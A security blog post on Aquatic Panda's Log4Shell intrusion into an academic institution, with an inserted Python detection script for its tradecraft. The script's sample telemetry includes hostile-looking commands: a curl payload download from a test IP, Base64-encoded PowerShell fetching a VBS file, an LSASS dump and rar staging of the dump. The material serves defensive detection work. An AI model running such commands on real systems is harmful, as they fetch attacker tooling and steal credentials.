January 23, 2022

TheCyberThrone

Thinking Security ! Always

Aquatic Panda Exploits With Log4j

The China-linked cyberespionage group Aquatic Panda was spotted exploiting the Log4Shell vulnerability (CVE-2021-44228) in an attack aimed at a large academic institution.

The APT group used a modified version of a Log4j exploit published on GitHub to perform reconnaissance.


In the attack against the unnamed academic institution, the threat actors targeted a VMware Horizon Tomcat web server that was using the Log4j library. They performed multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org, with the lookups running on the VMware Horizon instance and connecting back to the attacker-controlled DNS service.

The attackers executed multiple Linux commands on a Windows host on which the Apache Tomcat service was running, some of them with the intent to retrieve hacking tools from remote infrastructure.

The threat actor then executed a series of Linux commands, including an attempt to launch a bash-based interactive shell with a hardcoded IP address, as well as curl and wget commands to retrieve threat actor tooling hosted on remote infrastructure.

The threat actor then downloaded additional scripts and executed a Base64-encoded command via PowerShell to retrieve malware and three files with VBS file extensions from remote infrastructure. These files made up a reverse shell, which was loaded into memory via DLL search-order hijacking.

The APT group also made multiple attempts at credential harvesting by dumping the memory of the LSASS process using living-off-the-land binaries. The threat actor also leveraged WinRAR to compress the memory dump for later exfiltration.
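The activity described above (DNS connectivity checks to the callback domain, a Tomcat process spawning downloaders, Base64-encoded PowerShell retrieving files, LSASS dumping via living-off-the-land binaries, and WinRAR staging the dump) maps onto a handful of host and DNS telemetry checks. The following is an added example written for this page, not code from the original post or from any vendor; the process names, field names and sample events are constructed assumptions, with the callback domain taken from the post in its un-defanged form. It decodes `-EncodedCommand` payloads (UTF-16LE Base64, as PowerShell expects them) so the download cue can be matched in cleartext rather than in the encoded blob.

```python
"""Detection checks for the Aquatic Panda Log4Shell tradecraft, run over constructed sample telemetry."""
import base64
import re

# Callback domain named in the post (defanged there as dns[.]1433[.]eu[.]org).
CALLBACK_DOMAIN = "dns.1433.eu.org"

# Assumed process names. A Tomcat/Java service spawning shells or downloaders is a strong post-exploitation signal.
WEB_SERVER_IMAGES = {"java.exe", "tomcat9.exe", "ws_tomcatservice.exe"}
DOWNLOADER_IMAGES = {"curl.exe", "wget.exe", "bash.exe", "sh.exe", "powershell.exe", "cmd.exe"}
LOLBIN_DUMPERS = {"rundll32.exe", "procdump.exe", "procdump64.exe"}
ARCHIVERS = {"rar.exe", "winrar.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is Base64 of UTF-16LE text.
_ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|enco|encod|encode|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
_DOWNLOAD_CUE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitstransfer|https?://")


def decode_encoded_powershell(command_line):
    """Return the decoded -EncodedCommand payload, or None if the flag is absent or the blob is malformed."""
    match = _ENC_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError; odd byte counts fail UTF-16 decode
        return None


def classify_process_event(event):
    """Return the names of every check that fires for one process-creation event."""
    hits = []
    parent = event.get("parent_image", "").lower()
    image = event.get("image", "").lower()
    command_line = event.get("command_line", "")
    lowered = command_line.lower()

    # 1. Web server process spawning a shell or downloader (Log4Shell post-exploitation on Tomcat).
    if parent in WEB_SERVER_IMAGES and image in DOWNLOADER_IMAGES:
        hits.append("tomcat_spawned_downloader")

    # 2. Encoded PowerShell, escalated when the decoded payload fetches from the network.
    decoded = decode_encoded_powershell(command_line)
    if decoded is not None:
        hits.append("encoded_powershell")
        if _DOWNLOAD_CUE.search(decoded):
            hits.append("encoded_powershell_download")

    # 3. Living-off-the-land binary referencing LSASS or writing a minidump.
    if image in LOLBIN_DUMPERS and ("lsass" in lowered or ".dmp" in lowered):
        hits.append("lsass_dump_lolbin")

    # 4. Archiver packaging a memory dump for exfiltration.
    if image in ARCHIVERS and ".dmp" in lowered:
        hits.append("dump_archived")
    return hits


def is_callback_lookup(query_name):
    """True if the queried name is the callback domain or any subdomain of it (not a look-alike suffix)."""
    name = query_name.lower().rstrip(".")
    return name == CALLBACK_DOMAIN or name.endswith("." + CALLBACK_DOMAIN)


def run_detections(process_events, dns_queries):
    """Aggregate check names to counts across process and DNS telemetry."""
    summary = {}
    for event in process_events:
        for hit in classify_process_event(event):
            summary[hit] = summary.get(hit, 0) + 1
    callbacks = [q for q in dns_queries if is_callback_lookup(q)]
    if callbacks:
        summary["callback_dns_lookup"] = len(callbacks)
    return summary


def _encode_for_sample(script):
    """Build a sample -EncodedCommand blob the way PowerShell expects it (constructed test data only)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry; IPs are from the TEST-NET range and dumper arguments are elided.
SAMPLE_PROCESS_EVENTS = [
    {"parent_image": "ws_TomcatService.exe", "image": "curl.exe",
     "command_line": "curl.exe -o C:\\ProgramData\\t.sh http://203.0.113.7/t.sh"},
    {"parent_image": "cmd.exe", "image": "powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -EncodedCommand "
     + _encode_for_sample("Invoke-WebRequest -Uri http://203.0.113.7/a.vbs -OutFile C:\\ProgramData\\a.vbs")},
    {"parent_image": "cmd.exe", "image": "rundll32.exe",
     "command_line": "rundll32.exe [dll and export elided] 640 C:\\ProgramData\\lsass.dmp full"},
    {"parent_image": "cmd.exe", "image": "rar.exe",
     "command_line": "rar.exe a C:\\ProgramData\\out.rar C:\\ProgramData\\lsass.dmp"},
    {"parent_image": "explorer.exe", "image": "powershell.exe",
     "command_line": "powershell.exe Get-Service"},  # benign admin activity, should not fire
]
SAMPLE_DNS_QUERIES = ["a1b2c3.dns.1433.eu.org", "update.microsoft.com", "dns.1433.eu.org."]

if __name__ == "__main__":
    for name, count in sorted(run_detections(SAMPLE_PROCESS_EVENTS, SAMPLE_DNS_QUERIES).items()):
        print(f"{name}: {count}")
```

The suffix check in `is_callback_lookup` deliberately requires a leading dot so that a look-alike such as `fakedns.1433.eu.org` does not match, and the decoder treats a malformed blob as "no encoded command" rather than raising, which keeps a single bad event from halting a batch run.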


OverWatch tracked this intrusion closely and provided continuous updates to the victim organization, which was then able to quickly implement its incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.
